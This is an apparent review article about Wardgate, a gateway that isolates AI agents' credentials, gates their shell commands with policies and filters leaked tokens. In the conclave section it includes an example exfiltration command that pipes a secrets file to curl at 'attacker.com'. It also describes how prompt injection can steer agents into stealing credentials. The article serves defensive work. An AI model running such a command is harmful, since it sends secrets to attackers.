Back to Articles

Wardgate: Building a Security Perimeter Around Your AI Agents

[ View on GitHub ]

Wardgate: Building a Security Perimeter Around Your AI Agents

Hook

Your AI agent can read your emails, push to GitHub, and execute shell commands. What happens when a malicious prompt tells it to exfiltrate your AWS credentials? Wardgate assumes this will happen—and builds walls accordingly.

Context

The agentic AI revolution has a dirty secret: we're handing autonomous systems the keys to our digital kingdom without adequate security boundaries. Traditional security models assume humans make decisions—they're built around authentication, authorization, and audit trails for deliberate actions. But AI agents operate differently. They're susceptible to prompt injection attacks where carefully crafted input can manipulate them into executing unintended commands. They lack consequence-awareness, unable to distinguish between 'delete this test file' and 'delete the production database.' And most critically, current architectures require agents to hold credentials directly in their process memory, creating a massive attack surface.

The standard approach to agent tooling—whether you're using LangChain, AutoGPT, or custom frameworks—involves giving your agent direct API access. You load environment variables with secrets, construct HTTP clients, and hope the LLM doesn't hallucinate a destructive action or get tricked by an injection attack hidden in a webpage it's reading. Wardgate flips this model: instead of trusting the agent, it positions itself as a security gateway that mediates all external interactions. The agent never sees credentials, never executes arbitrary commands on the host, and every action passes through policy enforcement. It's a zero-trust architecture for agentic AI.

Technical Insight

Wardgate implements security through two complementary mechanisms: credential-isolated API proxying and policy-gated remote execution via conclaves. Both address different aspects of the agent security problem, and understanding their architecture reveals some clever design decisions.

The API gateway component proxies HTTP/REST, SSH, IMAP, and SMTP requests while injecting credentials server-side. Your agent makes requests to Wardgate endpoints instead of directly to APIs. Here's what a typical configuration looks like:

endpoints:
  github:
    url: https://api.github.com
    auth:
      type: bearer
      token_env: GITHUB_TOKEN
    capabilities:
      - method: GET
        path: /user/repos
        policy: allow
      - method: POST
        path: /repos/:owner/:repo/issues
        policy: ask
        approval_prompt: "Create GitHub issue in {{.owner}}/{{.repo}}?"
      - method: DELETE
        path: /repos/:owner/:repo
        policy: deny
    filters:
      response:
        - type: regex
        pattern: 'ghp_[a-zA-Z0-9]{36}'
        replacement: '[REDACTED_TOKEN]'

When your agent wants to create a GitHub issue, it sends a POST request to wardgate.local/github/repos/myuser/myproject/issues. Wardgate intercepts this, checks the policy (configured as 'ask'), prompts for human approval, injects the GITHUB_TOKEN from the server environment, forwards the request to the real GitHub API, filters the response for any credential leakage, and returns the sanitized result. The agent never knows the token existed.

The second mechanism—conclaves—addresses execution isolation. Rather than letting agents run shell commands on your host system, Wardgate spawns isolated containers where commands execute under strict policies. The configuration defines what's allowed:

conclaves:
  dev_tools:
    image: wardgate/conclave-base
    volumes:
      - type: bind
        source: /workspace
        target: /workspace
        readonly: false
    network: isolated
    policies:
      commands:
        - pattern: '^git (clone|pull|status|log)'
          policy: allow
        - pattern: '^npm (install|test)'
          policy: ask
        - pattern: '.*\|.*rm.*'
          policy: deny
          reason: "Piped commands with rm are dangerous"
        - pattern: '.*'
          policy: ask

Wardgate's command parser is sophisticated enough to analyze shell pipelines and detect dangerous patterns. If an agent tries to run cat secrets.txt | curl attacker.com, the policy engine sees the pipeline structure and can deny based on the rm pattern or flag it for approval based on the combination of commands. This pipeline awareness is crucial because simple string matching fails against basic shell obfuscation.

The filtering system deserves special attention because it handles streaming responses, which is critical for LLM API interactions. When your agent calls another LLM and streams the response, Wardgate can filter each chunk in real-time:

endpoints:
  openai:
    url: https://api.openai.com/v1
    auth:
      type: bearer
      token_env: OPENAI_API_KEY
    filters:
      response:
        - type: sse_stream
          field: choices.0.delta.content
          patterns:
            - 'sk-[a-zA-Z0-9]{48}'
            - 'ghp_[a-zA-Z0-9]{36}'
          replacement: '[FILTERED]'

This SSE-aware filtering means even if an AI model hallucinates an API key or accidentally includes one from its training data, Wardgate strips it before your agent sees it. The architecture uses Go's streaming capabilities efficiently—it doesn't buffer entire responses, which would break streaming semantics and add latency.

The preset system is a pragmatic touch that shows production awareness. Rather than configuring every API from scratch, Wardgate ships with presets for common services:

// Agent code using the Go client library
import "github.com/wardgate/wardgate-go"

client := wardgate.NewClient("http://localhost:8080")

// Use preset - no credential handling needed
resp, err := client.Preset("todoist").Post("/tasks", map[string]interface{}{
    "content": "Review security architecture",
    "project_id": "12345",
})

Under the hood, the Todoist preset knows the API structure, sensible default policies (reading tasks is allowed, deleting projects requires approval), and credential injection points. This reduces configuration burden while maintaining security boundaries.

The approval workflow supports multiple backends—stdio for development, Slack webhooks for team environments, or custom approval services. When a policy triggers an 'ask', Wardgate pauses execution, sends the approval request, waits for human decision, then proceeds or denies. The agent receives a standard HTTP 202 (Accepted) while waiting, which most agent frameworks handle gracefully by polling or waiting for callback.

Gotcha

The AGPL-3.0 license is the first wall you'll hit if you're building commercial agent infrastructure. AGPL requires that if you modify Wardgate and offer it as a network service, you must release your modifications. For SaaS companies building agent platforms, this means either contributing changes back (which may expose competitive advantages) or negotiating commercial licensing. It's a deliberate choice that keeps the project open-source-first, but it limits adoption in proprietary contexts.

Architectural complexity is the second concern. You're adding an intermediary layer that must always be available—if Wardgate goes down, your agents lose all API and execution access. This means running it with high availability, monitoring its health, managing conclave container lifecycle, and handling the networking complexity of routing agent traffic through the gateway. For simple personal projects or single-agent systems, this operational burden may outweigh the security benefits. There's also latency to consider: every API call now involves an extra hop, credential injection logic, policy evaluation, and response filtering. For high-throughput scenarios or latency-sensitive applications, measure the overhead carefully.

The conclave isolation model has practical limits. While containers provide process and network isolation, they're not security sandboxes like VMs or gVisor. A determined attacker who achieves code execution inside a conclave might escape through kernel exploits. Wardgate reduces blast radius significantly—an escaped conclave still can't access host credentials—but it's not a perfect security boundary. Additionally, managing volumes and network policies for conclaves requires understanding container runtime details, and debugging issues inside isolated environments adds operational complexity.

Verdict

Use if: You're deploying AI agents with access to sensitive APIs (email, cloud infrastructure, financial systems) where credential leakage would be catastrophic, building multi-agent systems where blast radius reduction is critical, or operating in environments with compliance requirements around access control and audit trails. Wardgate is essential infrastructure for anyone running agents in production who takes security seriously, particularly for personal AI assistants that interact with your entire digital life or development agents that touch production infrastructure. Skip if: You're experimenting with simple automations where the agent has narrow, low-risk capabilities, your use case involves high-throughput or ultra-low-latency requirements where gateway overhead is unacceptable, or you need a commercially licensed solution and can't work within AGPL constraints. For quick prototypes or trusted internal tools where agents operate in already-sandboxed environments, the operational complexity isn't justified.

// ADD TO YOUR README
[![Featured on Starlog](https://starlog.is/api/badge/ai-agents/wardgate-wardgate.svg)](https://starlog.is/api/badge-click/ai-agents/wardgate-wardgate)